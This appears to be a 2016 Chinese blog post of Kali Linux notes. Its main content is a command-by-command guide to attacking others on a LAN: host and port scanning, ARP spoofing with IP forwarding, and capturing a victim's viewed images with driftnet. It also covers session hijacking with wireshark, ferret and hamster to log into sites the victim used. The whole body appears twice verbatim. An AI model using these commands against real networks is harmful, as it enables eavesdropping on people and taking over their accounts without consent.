Kali渗透基础
2016-11-14 18:41
183 查看
######局域网断网攻击
fping -asg 192.168.1.0/24 ##扫描0网段所有能ping通的ip
nmap -Ss 192.168.1.141 ##扫描141主机打开的端口
arp攻击
arpspoof -i 自己的网卡 -t 目标IP 目标网关
例如:arpspoof -i eth0 -t 192.168.1.100
192.168.1.1
######局域网arp欺骗
目标的IP流量经过我的网卡,从网关出去
首先,进行IP流量转发
echo 1 >/proc/sys/net/ipv4/ip_forward (echo写命令,是不会有回显的)
再进行arpspoof命令
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
此时目标的流量将会经过我的网卡,就成为了arp欺骗
driftnet ##获取本机网卡的图片
因为目标的流量此时经过我的网卡,所以我获取本机网卡图片=获得目标所浏览图片
#######会话劫持——登陆别人登录过的网站
所用软件:
wireshark ##抓包
ferret ##重新生成抓包后的文件
hamster ##重放流量
首先对目标进行arp欺骗,然后用wireshark进行抓包
当目标登陆了某些网站时,wireshark上会显示很多DNS的信息
此时停止抓包,将文件保存为pcap格式,关闭wireshark,
进入保存文件的目录,使用ferret -r 文件名 命令,生成一个.txt的文件,此时执行hamster命令,会生成一些信息(127.0.0.1:1234)
意思是把代理改为127.0.0.1的1234端口
然后在浏览器输入127.0.0.1:1234即可看到一个ip,点击后进入,有很多地址,在其中找到我们需要的即可
第二种方法:
不用欺骗了
ferret -i eth0
另开一个标签
hamster
改代理端口,同上
Nmap基础学习
nmap 192.168.1.102 扫描此ip地址开放的所有端口
也支持多个ip同时扫描
nmap 192.168.1.102 192.168.8.223
或在同一个子网下:nmap 192.168.1.102,24,171 同时扫描3个ip地址
也可以将需要扫描的ip地址存在一个文件里,通过nmap -iL filename 扫描文件里所有的ip
随机扫描:nmap -iR 3 随机扫描3个ip(我也没搞清楚是什么里的3个)
排除某些ip扫描:如:nmap 10.73.26.0/24 --exclude 10.73.26.183-190 (扫描所有ip除了183到190)
nmap 10.73.26.0/24 --excludefile file.txt (扫描所有ip除了file.txt里的ip)
扫描开放网络端口:
nmap -o 识别远程操作系统
-sC 运行默认的脚本扫描
-A 10.73.31.64
可以在扫描出端口后,若有23端口telnet开放,可以使用netcat进行远程连接:
命令:nc ipaddress 23
fping -asg 192.168.1.0/24 ##扫描0网段所有能ping通的ip
nmap -Ss 192.168.1.141 ##扫描141主机打开的端口
arp攻击
arpspoof -i 自己的网卡 -t 目标IP 目标网关
例如:arpspoof -i eth0 -t 192.168.1.100
192.168.1.1
######局域网arp欺骗
目标的IP流量经过我的网卡,从网关出去
首先,进行IP流量转发
echo 1 >/proc/sys/net/ipv4/ip_forward (echo写命令,是不会有回显的)
再进行arpspoof命令
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
此时目标的流量将会经过我的网卡,就成为了arp欺骗
driftnet ##获取本机网卡的图片
因为目标的流量此时经过我的网卡,所以我获取本机网卡图片=获得目标所浏览图片
#######会话劫持——登陆别人登录过的网站
所用软件:
wireshark ##抓包
ferret ##重新生成抓包后的文件
hamster ##重放流量
首先对目标进行arp欺骗,然后用wireshark进行抓包
当目标登陆了某些网站时,wireshark上会显示很多DNS的信息
此时停止抓包,将文件保存为pcap格式,关闭wireshark,
进入保存文件的目录,使用ferret -r 文件名 命令,生成一个.txt的文件,此时执行hamster命令,会生成一些信息(127.0.0.1:1234)
意思是把代理改为127.0.0.1的1234端口
然后在浏览器输入127.0.0.1:1234即可看到一个ip,点击后进入,有很多地址,在其中找到我们需要的即可
第二种方法:
不用欺骗了
ferret -i eth0
另开一个标签
hamster
改代理端口,同上
Nmap基础学习
nmap 192.168.1.102 扫描此ip地址开放的所有端口
也支持多个ip同时扫描
nmap 192.168.1.102 192.168.8.223
或在同一个子网下:nmap 192.168.1.102,24,171 同时扫描3个ip地址
也可以将需要扫描的ip地址存在一个文件里,通过nmap -iL filename 扫描文件里所有的ip
随机扫描:nmap -iR 3 随机扫描3个ip(我也没搞清楚是什么里的3个)
排除某些ip扫描:如:nmap 10.73.26.0/24 --exclude 10.73.26.183-190 (扫描所有ip除了183到190)
nmap 10.73.26.0/24 --excludefile file.txt (扫描所有ip除了file.txt里的ip)
扫描开放网络端口:
nmap -o 识别远程操作系统
-sC 运行默认的脚本扫描
-A 10.73.31.64
可以在扫描出端口后,若有23端口telnet开放,可以使用netcat进行远程连接:
命令:nc ipaddress 23
相关文章推荐
- [原创]java局域网聊天系统
- 哪里可以找到 Kali Linux 的教程?
- 一个注册表搞定“打开局域网机器文件提示”
- 渗透技术一瞥(图)
- 批处理常用网络命令和符号篇
- 服务器ARP病毒的特征及防护说明
- 通过批处理bat解决局域网打印机共享问题
- 局域网遭遇“ARP”病毒的新变种附临时解决方法
- 远程连接局域网内的SQL Server 的方法
- 如何解决局域网内mysql数据库连接慢
- 防arp欺骗的批处理 自动绑定网关的批处理
- 再论局域网互访故障问题的解决方法图文教程
- C#列出局域网中可用SQL Server服务器(续)
- Arp命令使用方法
- apache 局域网访问配置方案第1/2页
- C#获取局域网MAC地址的简单实例
- 局域网“内鬼” 非授权DHCP服务器防范策略第1/2页
- Python实现扫描局域网活动ip(扫描在线电脑)
- 免费ARP应用探讨